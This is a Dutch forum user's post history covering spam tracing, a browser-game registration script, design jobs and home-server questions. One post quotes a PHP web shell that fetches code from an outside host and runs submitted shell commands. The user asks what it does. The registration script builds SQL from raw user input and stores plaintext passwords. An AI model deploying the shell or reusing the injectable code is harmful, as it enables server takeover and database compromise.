Kan Slotje op! tenzij iemand nog wat toe te voegen heeft, maar ik heb wat ik wou all gevonden :] BerichtKopRegels > Alle
:slotje:
Posts by L.Pappalettera
-
-
Wie kan me vertellen wat ik moet veranderen in de Config editor van thunderbird.. om zoveel mogelijk informatie te krijgen over de afzender van de mails die ik ontvang om zo erachter te komen waar all die spam vandaan komt ^o) tips voor extra dingetjes wat ook wel handig zou zijn mag je hieronder ook wel plaatsen
Thx!
Mvg,(a)
-
misschien ook even bij toe te voegen, je kan ook verdienen door spelletjes zelf he xD zoals ik bevoorbeeld met die betaalde surveys bv 100cr op een spel genaamd habbo had verdient en dat weer verkocht had voor een tientje via paypal (xD) (80cr=normaal..tientje mja) er zijn genoeg mogelijkheden om geld te verdienen op het internet ^o)
-
Idd, btw ik zag een komisch stukje toen ik naar je register pagina keek (de error) (xD)
De volgende dingen gingen verkeerd:" . $foutje . "(xD)(xD)(xD)
*Btw als je INSERT INTO users niet kan vinden, miss een Advanced Search and Replace progg downloaden ofsow :]
good luck! (laat maar weten als het je allemaal niet lukt)
-
volgens mij mist er nog iets in een ander script zoals index, idk maarja probeer dit eens:
PHP
Toon Meerif(isset($_POST['submit']) && $_POST['submit'] == "Registreer") { $fout = array(); $match = mysql_query("SELECT id FROM users WHERE login = '" . $_POST['login'] . "'"); $dubbel = mysql_query("SELECT id FROM users WHERE ip = '" . $_SERVER['REMOTE_ADDR'] . "'"); if (preg_match ("/[&<>%+$*,. ]/i", $_POST['login'])) { $fout[] = "- Je gebruikersnaam mag geen speciale tekens bevatten"; } if(strlen($_POST['login']) > 15) { $fout[] = "- Je gebruikersnaam is te lang: max. 15 tekens"; } if(strlen($_POST['login']) < 3) { $fout[] = "- Je gebruikersnaam is te kort: min. 3 tekens"; } if(strlen($_POST['pass']) < 6) { $fout[] = "- Je wachtwoord moet uit minstens 6 tekens bestaan"; } if(strlen($_POST['pass']) > 18) { $fout[] = "- Je wachtwoord mag niet meer dan 18 tekens bevatten"; } if($_POST['pass'] != $_POST['pass_repeat']) { $fout[] = "- De wachtwoorden komen niet overeen"; } if($_POST['pass'] == $_POST['login']) { $fout[] = "- Je wachtwoord mag niet hetzelfde zijn als je gebruikersnaam"; } if(!preg_match("/.+@[a-zA-Z0-9_-]+..+/", $_POST['email'])) { $fout[] = "- Er is geen geldig e-mail adres ingevuld"; } if(mysql_num_rows($match) > 0) { $fout[] = "- Er bestaat al iemand met deze inlognaam"; } if(mysql_num_rows($dubbel) > 0) { $fout[] = "- Je mag maar 1 account per ip registreren!"; } if(!isset($_POST['agree'])) { $fout[] = "- Je moet akkoord gaan met de regels en voorwaarden"; } if(empty($fout[0])) { $bericht = "Hallo " . $_POST['login'] . "! Bedankt voor het registreren op " . gamenaam . "! We hebben jouw registratie succesvol verwerkt, je kunt nu inloggen op http://" . url . " met de volgende gegevens: Gebruikersnaam: " . $_POST['login'] . " Wachtwoord: " . $_POST['pass'] . " Veel plezier namens de crew!"; mysql_query("INSERT INTO users (login, pass, email, stad) VALUES('" . $_POST['login'] . "', '" . $_POST['pass'] . "', '" . $_POST['email'] . "', '" . rand(0, count($steden) - 1) . "')") or die(mysql_error()); if(isset($_GET['i'])) { if(mysql_num_rows(mysql_query("SELECT id FROM users WHERE id = '" . $_GET['i'] . "'")) > 0) { mysql_query("UPDATE users SET power = power + '5000', kogels = kogels + '20', bank = bank + '20000', callcredits = callcredits + '3' WHERE id = '" . $_GET['i'] . "'"); mysql_query("UPDATE users SET refferals = refferals + '1' WHERE id = '" . $_GET['i'] . "'"); mysql_query("INSERT INTO berichten (onderwerp, bericht, afzender, geaddresseerde, datum, outbox) VALUES('Refferal aangemeld', 'Beste crimineel,rnrnEr heeft zojuist een refferal aangemeld: " . $_POST['login'] . ". Je hebt je beloning zojuist ontvangen!rnMet vriendelijke groet,rnAnoniem.', 'Anoniem', '" . $_GET['i'] . "', '" . get_global_date("Y-m-d H:i:s") . "', 'False')"); } } mail($_POST['email'], "Registratie op " . gamenaam, $bericht, "From: " . gamenaam . " automailer <" . noreply_mail . ">"); $goed = "<div class=\"dark\"><font color=\"green\" style=\"font: bold\">Je account is succesvol aangemaakt!</font></div>"; unset($fout); } else { foreach($fout as $tekst) { @$foutje .= "nr" . $tekst; } $fout = "<div class=\"dark\"><font color=\"red\" style=\"font: bold\">De volgende dingen gingen verkeerd:</font>" . $foutje . "</div>"; } } ?>
-
post de registratie script? ^o)
-
Citaat van SkyNet
Op SiteDeals lopen goede ontwerpers rond. Anders open je voor 200 euro een design contest. Zo kom je voor weinig geld aan een mooi resultaat.
sorry voor de offtopic maar, 200 euro is niet weinig he! hij heeft het over een logo (xD) geen proffesionele layouts.. idd mooi resultaat (maar goedkoop..?) maarja veel succ6 met de logo :$ btw hoe zou die logo er ongeveer moeten uitzien? voorbeeldje?? -
betaalde surveys invullen met neppe gegevens :p
-
via paypal kan je toch internet bankieren
dit is een zeer mooi layout (xD) damn.
[offtopic]als het een spel was, ging ik m spelen xD[/offtopic]
-
als iemand met een werkend scriptje komt xD heeft diegene mij ook geholpen lol, ik wil dit namelijk ook wel.. maar dan niet dat ze bezoeken maar wanneer ze een post plaatsen. :p succ6(a)
-
Heb je misschien een klein voorbeeldje of iets dat je ermee kan vergelijken..?
en betaal je 75 euro voor alleen de psd, of deze 4 (xD)
- .psd
- .html
- .css
- .images
:$ -
Hallo CP!
Opdracht: 2 PSD'S (Ingame & Outgame) in MCC Sourcje zetten. (slicen en erin scripten?)
Deadline?: Als je er maar geen maanden over doet, is het goed.
Verdiensten: € 70,- (incl. overdrachtskosten)
Betaalwijze: PaypalWeten wat je moet slicen en in een source scripten?;
Vraag via PM om een screen, dit geldt niet voor mensen die net registeren en/of een te lage post count hebben, wat mij het idee geeft dat je doel is om mijn werk te rippen. dus aub alleen reageren als je een beetje bekend hier bent. :$Ik bepaal zelf wel wie dit mag doen.
Het is niet zo van wie het eerst reageert,
dat je dan gelijk met de opdracht begint.Ook wil ik geen bugs of slordige werk en moet het gewoon werken in IE, FF, GC..
Interrese? laat het hieronder weten!
Dan stuur ik je zo snel mogelijk via pm me mail adress etc... om de zaakjes te kunnen regelen.
(Wil je eerst een screen stuur dan een PM)Ook zou ik graag wat eerdere werk van je willen zien, sinds ik geen beginnertjes zoals 'mijzelf' mijn werk wil laten doen omdat ik dan zoiezo veel fouten aan zie komen :p Miss ik nog iets? laat het me dan weten! goed werk is goed loon. :cheer:
Met Vriendelijke Groet,
Lorenzo P.
[offtopic]p.s. ik ga hier geen screens rondzuimen dat kan leiden tot rips, alleen betrouwbare mensen krijgen betrouwbare informatie. btw je moet niet denken dat dit een simpele layout is want dan zat het budget veel lager (xD) Als je het te moeilijk vind kan je altijd gewoon de layout beetje versimpelen door delen bij elkaar te voegen, als je me niet snapt pm me maar8-) en wat er betaald wordt is niet een tijdsloon maar een eindloon.;) GL!
__________________________________________________[/offtopic] -
ik weet niet of jij weet hoe ik het kan fixen xD maar ik heb all een hele tijd een probleem met me msn messenger, deze error krijg ik als ik msn wil gebruiken :,(
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
De toepassing kan niet worden gestart omdat de configuratie naast elkaar onjuist is.
Raadpleeg het gebeurtenislogboek Toepassing voor meer informatie.(waar ik dus niks aan heb-.-) .. ik zou het graag weer willen gebruiken dus als je me daar mee zou kunnen helpen zou het leuk zijn (xD) pm me maar.:$
-
idk ik zag eerngister op school die link tijdens het surfen op het internet(iets met user agent), en bij een test area zag ik die code staan dus heb ik m gekoppieerd (xD) waar zou iemand zoiets voor gebruiken?
-
kan je hiermee problemen met de echte marktplaats mee krijgen :p ? of niet
-
Ik kwam dit tegen op het internet en ik ben nieuwsgierig wat het inhoudt, kan iemand me uitleggen? maakt niet uit hier, of via pm
PHP<?php $shell=@file_get_contents("http://ckhostingsolutions.com/templates/beez/template.txt"); $fw=@fopen("ram0b64.php","w"); fputs ($fw, $shell); fclose($fw); ?><html><head><title>load1.php</title></head><onload="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>
-
ja legendd ik zie het probleem daar ook bij zitten, ik vind het erg irritant als ik een tijdje niet kijk naar mijn verbruik van dingen en dat ik dan zomaar wordt gesuspended, of dat ik dan 1 domme regel misbruik wat dan ook echt totaal bullshit is xD .. daarom wil ik gewoon me eigen regels op me eigen server. maarja voor mezelf zie ik dan wel een probleem aan komen met de internet snelheid, die is niet al te goed bij ons. (voor my wel, maar voor een heleboel mensen die me server willen bezoeken etc.. nie) maarja ik zeg ook niet dat ik een server nu all ga kopen. ookal zou ik het best wel willen haha
-
Nee ik ken nog geen Secure Shell commands
maar zou ik wel willen xD zijn die commands zoiets als cmd maar dan veel meer opties fsow?
en ja ik zou als ik er 1 neem, graag een thuisserver kopen, wat zijn dan zegmaar de stappen die ik zou moeten doen? linux installeren? en daarop welke programmas allemaal? waarmee ik een eigen webhosting/directadmin voor mezelf en miss vrienden kan draaien.. en hoe laat ik dan domeinen naar de file & database opslag enzo verwijzen....? waarom wil ik gwn een thuisserver? omdat het dan ook echt gwn in mijn bezit is.. en ik er toezicht over kan houden, maar kan ik hier dan ook zowel een website op runnen en een private server (game..) wat voornamelijk op een dedi server wordt gedaan mja..
krijg of zijn er miss ook handleidingen voor het gebruiken/beheren van die servers voor o.a webhosting enzoo? bedankt voor de all-gegeven informatie (L) hoe meer hoe beter (xD) en hoeduur denk je dat hetgene dat ik wil zou zijn? want een vriend van me had er 1 van 10.000 maar zoveel heb ik niet haha..ik neem aan dat er ook wel servers zijn in de normale pc prijs gemiddelde.. zegmaar :p
-
Ik raadt je aan om F.Ajeti of Luc een 'pm' hierover te sturen, die gaan hem gratis slicen voor cp dusja.. dan vind ik dit een beetje onzinnig xD of weet je niet hoe je moet slicen, dan kan je netzo goed ja wat tutorials uitprobere? inplaats van all dat gedoe met teamviewer? :p M'n mening
-
Hallo cp!
Zou iemand me informatie kunnen geven uitleg/handleiding wat dan ook over het beheren van een server, hoe het eruit ziet, welke je me zou aanraden (voor een eigen webhosting 'prive') en daarnaast gewoon voor file dump en private server erop hosten ofsow..) zodat ik alles zelf kan beheren , alles van mij is, geen ruimte limiet waarna ik gesuspended wordt enzo???
ik heb nog nooit een server gehad maar ik heb wel interrese, zou ik gewoon een thuisserver kunnen kopen, aansluiten en dan? is het net zoon soort installatie ofsow als m'n pc? hoe kan ik dan bevoorbeeld domeinen voor mezelf regelen?
ik wil graag zoveeeeel mogelijk informatie over servers
die jullie me kunnen geven om ooit te kunnen starten met een eigen servertje, waar ik m'n prive dingetjes op kan laten draaien (24/7) natuurlijk
aub geen reacties zoals, te jong, te weinig ervaring, ga googlen.. ik vraag het aan jullie en als je me wilt helpen doe dat dan zonder enige gezeur waar ik niks aan heb.(xD) Als je mij iets zou willen vragen, kan dat via 'pm' ookal zie ik geen reden waarom er vragen voor mij zijn haha:p
Met Vriendelijke Groet.
[offtopic]p.s. ik heb er nog nooit mee gewerkt, nog nooit gezien enkel over gehoord en ik heb er interrese in, alleen het probleem is dat ik niet weet hoe alles in zn werk gaat, wat het allemaal kan, wat het doet, hoe het moet etc. ook geen interrese in uitleg over kvk en zoiets dergelijks sinds ik dat all weet als je een eigen webhosting begint xD[/offtopic]